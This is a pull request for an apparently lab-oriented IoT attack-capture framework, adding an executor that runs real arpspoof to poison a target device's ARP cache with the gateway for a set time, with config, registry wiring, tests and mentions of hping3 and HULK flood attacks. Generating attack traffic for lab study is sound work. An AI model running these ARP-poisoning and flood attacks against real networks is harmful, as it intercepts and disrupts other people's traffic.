### PR TITLE
feat: ARP spoofing/MITM attack via real arpspoof

### DIFF
--- a/README.md
+++ b/README.md
@@ -164,6 +164,7 @@ Each attack is defined by a `kind` field and mapped to an executor:
 
 * `command` executes external binaries such as `nmap` or `hping3`
 * `hulk` runs an in-process HTTP flood (HULK) against the target device; configurable via `duration_seconds` and `thread_count`
+* `arp_spoof` runs real `arpspoof` against a device for a bounded `duration_seconds`, poisoning its ARP relationship with `gateway_ip` on `interface` (classic on-path MITM)
 * `placeholder` is a disabled stub for attacks not yet implemented (cannot be `enabled: true`)
 * additional attack types can be added via the registry
 

--- a/configs/attacks.yaml
+++ b/configs/attacks.yaml
@@ -57,6 +57,18 @@ attacks:
     repeats: 3
     duration_seconds: 60
 
+  # ARP Spoofing / MITM (#82)
+  # interface/gateway_ip are placeholders - verify these match the actual
+  # lab NIC and router address before enabling.
+  - name: arp_spoof_gateway_mitm
+    label: ARP_Spoof_Gateway_MITM
+    kind: arp_spoof
+    enabled: true
+    repeats: 2
+    interface: eth0
+    gateway_ip: 192.168.1.1
+    duration_seconds: 30
+
   # - name: http_request
   #   label: HTTP_Request
   #   enabled: false

--- a/src/capex/attacks/arp.py
+++ b/src/capex/attacks/arp.py
@@ -1,0 +1,57 @@
+from __future__ import annotations
+
+import subprocess
+import time
+
+from typing import TYPE_CHECKING
+
+from capex.exceptions import AttackExecutionError
+
+if TYPE_CHECKING:
+    from capex.models import ArpSpoofAttackConfig, DeviceConfig
+    from capex.runner import CommandRunner
+
+_START_CHECK_DELAY_SECONDS = 0.3
+_STOP_TIMEOUT_SECONDS = 10
+_KILL_TIMEOUT_SECONDS = 5
+
+
+class ArpSpoofExecutor:
+    """Runs real arpspoof against a device for a bounded duration, then stops it.
+
+    Poisons the device's ARP cache for its relationship with gateway_ip
+    (classic on-path MITM), mirroring TcpdumpCapture's popen/terminate/kill
+    start-stop pattern since arpspoof itself runs until killed.
+    """
+
+    def __init__(self, *, runner: CommandRunner, attack: ArpSpoofAttackConfig) -> None:
+        self._runner = runner
+        self._attack = attack
+
+    def execute(self, *, device: DeviceConfig) -> str | None:
+        process = self._runner.popen([
+            self._attack.arpspoof_binary,
+            '-i',
+            self._attack.interface,
+            '-t',
+            str(device.ip),
+            self._attack.gateway_ip,
+        ])
+
+        time.sleep(_START_CHECK_DELAY_SECONDS)
+
+        if process.poll() is not None:
+            _, stderr = process.communicate()
+            msg = f'{self._attack.arpspoof_binary} exited immediately with code {process.returncode}: {stderr.strip()}'
+            raise AttackExecutionError(msg)
+
+        time.sleep(self._attack.duration_seconds)
+
+        process.terminate()
+        try:
+            process.wait(timeout=_STOP_TIMEOUT_SECONDS)
+        except subprocess.TimeoutExpired:
+            process.kill()
+            process.wait(timeout=_KILL_TIMEOUT_SECONDS)
+
+        return f'duration_seconds={self._attack.duration_seconds}'

--- a/src/capex/attacks/registry.py
+++ b/src/capex/attacks/registry.py
@@ -2,6 +2,7 @@ from __future__ import annotations
 
 from typing import TYPE_CHECKING
 
+from capex.attacks.arp import ArpSpoofExecutor
 from capex.attacks.builtins import CommandAttackExecutor, PlaceholderAttackExecutor
 from capex.attacks.hulk import HulkAttackExecutor
 from capex.exceptions import RegistryError
@@ -29,6 +30,11 @@ class AttackRegistry:
                 )
             case 'hulk':
                 return HulkAttackExecutor(
+                    attack=attack,
+                )
+            case 'arp_spoof':
+                return ArpSpoofExecutor(
+                    runner=self._runner,
                     attack=attack,
                 )
             case _:

--- a/src/capex/models.py
+++ b/src/capex/models.py
@@ -48,7 +48,21 @@ class HulkAttackConfig(BaseModel):
     thread_count: PositiveInt = 100
 
 
-AttackConfig = CommandAttackConfig | PlaceholderAttackConfig | HulkAttackConfig
+class ArpSpoofAttackConfig(BaseModel):
+    model_config = ConfigDict(extra='forbid')
+
+    kind: Literal['arp_spoof'] = 'arp_spoof'
+    name: str = Field(min_length=1)
+    label: str = Field(min_length=1)
+    enabled: bool = True
+    repeats: PositiveInt = 3
+    interface: str = Field(min_length=1)
+    gateway_ip: str = Field(min_length=1)
+    duration_seconds: PositiveInt = 30
+    arpspoof_binary: str = 'arpspoof'
+
+
+AttackConfig = CommandAttackConfig | PlaceholderAttackConfig | HulkAttackConfig | ArpSpoofAttackConfig
 
 
 class AttackFile(BaseModel):

--- a/tests/test_arp.py
+++ b/tests/test_arp.py
@@ -1,0 +1,102 @@
+from __future__ import annotations
+
+import subprocess
+
+import pytest
+
+from capex.attacks import arp
+from capex.exceptions import AttackExecutionError
+from capex.models import ArpSpoofAttackConfig, DeviceConfig
+
+
+class _FakeProcess:
+    def __init__(self, *, exited: bool = False, returncode: int = 1, stderr: str = '') -> None:
+        self._exited = exited
+        self.returncode = returncode if exited else None
+        self._stderr = stderr
+        self.terminate_called = False
+        self.kill_called = False
+        self._wait_calls = 0
+        self.timeout_on_first_wait = False
+
+    def poll(self) -> int | None:
+        return self.returncode
+
+    def communicate(self) -> tuple[str, str]:
+        return '', self._stderr
+
+    def terminate(self) -> None:
+        self.terminate_called = True
+
+    def kill(self) -> None:
+        self.kill_called = True
+        self.returncode = -9
+
+    def wait(self, timeout: float | None = None) -> int:
+        self._wait_calls += 1
+        if self.timeout_on_first_wait and self._wait_calls == 1:
+            raise subprocess.TimeoutExpired(cmd='arpspoof', timeout=timeout or 0)
+        self.returncode = self.returncode if self.returncode is not None else -15
+        return self.returncode
+
+
+class _FakeRunner:
+    def __init__(self, process: _FakeProcess) -> None:
+        self._process = process
+        self.popen_args: list[str] | None = None
+
+    def popen(self, args, *, cwd=None):
+        self.popen_args = list(args)
+        return self._process
+
+
+def test_arp_spoof_executor_runs_for_duration_then_terminates(monkeypatch) -> None:
+    process = _FakeProcess(exited=False)
+    runner = _FakeRunner(process)
+    monkeypatch.setattr(arp.time, 'sleep', lambda seconds: None)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = ArpSpoofAttackConfig(
+        name='arp_spoof',
+        label='ARP_Spoof',
+        interface='eth0',
+        gateway_ip='192.168.1.1',
+        duration_seconds=30,
+    )
+    executor = arp.ArpSpoofExecutor(runner=runner, attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert runner.popen_args == ['arpspoof', '-i', 'eth0', '-t', '192.168.1.1', '192.168.1.1']
+    assert process.terminate_called is True
+    assert process.kill_called is False
+    assert detail == 'duration_seconds=30'
+
+
+def test_arp_spoof_executor_raises_when_process_exits_immediately(monkeypatch) -> None:
+    process = _FakeProcess(exited=True, returncode=1, stderr='arpspoof: eth9: No such device exists')
+    runner = _FakeRunner(process)
+    monkeypatch.setattr(arp.time, 'sleep', lambda seconds: None)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = ArpSpoofAttackConfig(name='arp_spoof', label='ARP_Spoof', interface='eth9', gateway_ip='192.168.1.1')
+    executor = arp.ArpSpoofExecutor(runner=runner, attack=attack)
+
+    with pytest.raises(AttackExecutionError, match='No such device exists'):
+        executor.execute(device=device)
+
+
+def test_arp_spoof_executor_kills_process_that_does_not_terminate_in_time(monkeypatch) -> None:
+    process = _FakeProcess(exited=False)
+    process.timeout_on_first_wait = True
+    runner = _FakeRunner(process)
+    monkeypatch.setattr(arp.time, 'sleep', lambda seconds: None)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = ArpSpoofAttackConfig(name='arp_spoof', label='ARP_Spoof', interface='eth0', gateway_ip='192.168.1.1')
+    executor = arp.ArpSpoofExecutor(runner=runner, attack=attack)
+
+    executor.execute(device=device)
+
+    assert process.terminate_called is True
+    assert process.kill_called is True

--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -2,7 +2,7 @@ from __future__ import annotations
 
 from ipaddress import IPv4Address
 
-from capex.models import CommandAttackConfig, DeviceConfig
+from capex.models import ArpSpoofAttackConfig, CommandAttackConfig, DeviceConfig
 
 
 def test_device_config_validates() -> None:
@@ -17,3 +17,9 @@ def test_attack_config_validates() -> None:
         command=['hping3', '--udp', '-c', '100', '-p', '53', '{target_ip}'],
     )
     assert attack.repeats == 3
+
+
+def test_arp_spoof_attack_config_defaults() -> None:
+    attack = ArpSpoofAttackConfig(name='arp_spoof', label='ARP_Spoof', interface='eth0', gateway_ip='192.168.1.1')
+    assert attack.duration_seconds == 30
+    assert attack.arpspoof_binary == 'arpspoof'

--- a/tests/test_registry.py
+++ b/tests/test_registry.py
@@ -4,11 +4,12 @@ import types
 
 import pytest
 
+from capex.attacks.arp import ArpSpoofExecutor
 from capex.attacks.builtins import CommandAttackExecutor, PlaceholderAttackExecutor
 from capex.attacks.hulk import HulkAttackExecutor
 from capex.attacks.registry import AttackRegistry
 from capex.exceptions import RegistryError
-from capex.models import CommandAttackConfig, HulkAttackConfig, PlaceholderAttackConfig
+from capex.models import ArpSpoofAttackConfig, CommandAttackConfig, HulkAttackConfig, PlaceholderAttackConfig
 from capex.runner import CommandRunner
 
 
@@ -45,6 +46,18 @@ def test_registry_resolves_hulk_attack() -> None:
     )
     resolved = registry.resolve(attack)
     assert isinstance(resolved, HulkAttackExecutor)
+
+
+def test_registry_resolves_arp_spoof_attack() -> None:
+    registry = AttackRegistry(CommandRunner())
+    attack = ArpSpoofAttackConfig(
+        name='arp_spoof',
+        label='ARP_Spoof',
+        interface='eth0',
+        gateway_ip='192.168.1.1',
+    )
+    resolved = registry.resolve(attack)
+    assert isinstance(resolved, ArpSpoofExecutor)
 
 
 def test_registry_raises_registry_error_for_unsupported_kind() -> None:


### PR DESCRIPTION
Part of the attack-library expansion roadmap in #66. Resolves #82.

## Summary
- New native executor `ArpSpoofExecutor` (`kind: arp_spoof`): runs real `arpspoof` against a device for a bounded `duration_seconds`, poisoning its ARP relationship with `gateway_ip` on `interface` — classic on-path MITM, a common lateral-movement step in real IoT botnet activity.
- Since `arpspoof` runs until killed rather than exiting on its own, this mirrors `TcpdumpCapture`'s `popen`/`terminate`/`kill` start-stop pattern (`capture.py`) rather than the blocking `CommandRunner.run` used by other `command`-kind attacks: start it, verify it didn't exit immediately (bad interface, etc.), sleep for the duration, then terminate (kill as a timeout fallback).
- New `arp_spoof_gateway_mitm` entry in `attacks.yaml` — **`interface: eth0` and `gateway_ip: 192.168.1.1` are placeholders**, please verify these match the actual lab NIC and router address before running.
- Registered in `AttackRegistry`, added to the `AttackConfig` union, documented in README.

MITRE: T1557.002 ARP Cache Poisoning.

## Test plan
- [x] `uv run pytest` — full suite green (97 tests)
- [x] `uv run pytest --cov=capex` — `arp.py` and `registry.py` both 100%
- [x] `uv run ruff format . && uv run ruff check .` — clean
- [x] `uv run capex --dry-run` — confirms `configs/attacks.yaml` loads/validates with the new entry

I'll merge this manually; will close #82 with a comment linking the merge afterward.